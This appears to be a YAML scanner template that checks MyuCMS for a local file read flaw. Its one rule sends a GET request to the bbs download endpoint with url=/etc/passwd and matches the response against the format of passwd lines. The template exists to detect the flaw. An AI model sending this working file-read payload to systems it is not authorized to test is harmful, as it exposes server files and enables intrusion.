myucms-lfr: myucms lfr

id: myucms-lfr

info:
  name: myucms lfr
  author: jinqi
  severity: high
  description: |-
    myucms 存在本地文件读取漏洞，攻击者通过漏洞可以读取服务器任意文件
  tags: myucms,lfr
  created: 2025/03/27

rules:
  r0:
    request:
      method: GET
      path: /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()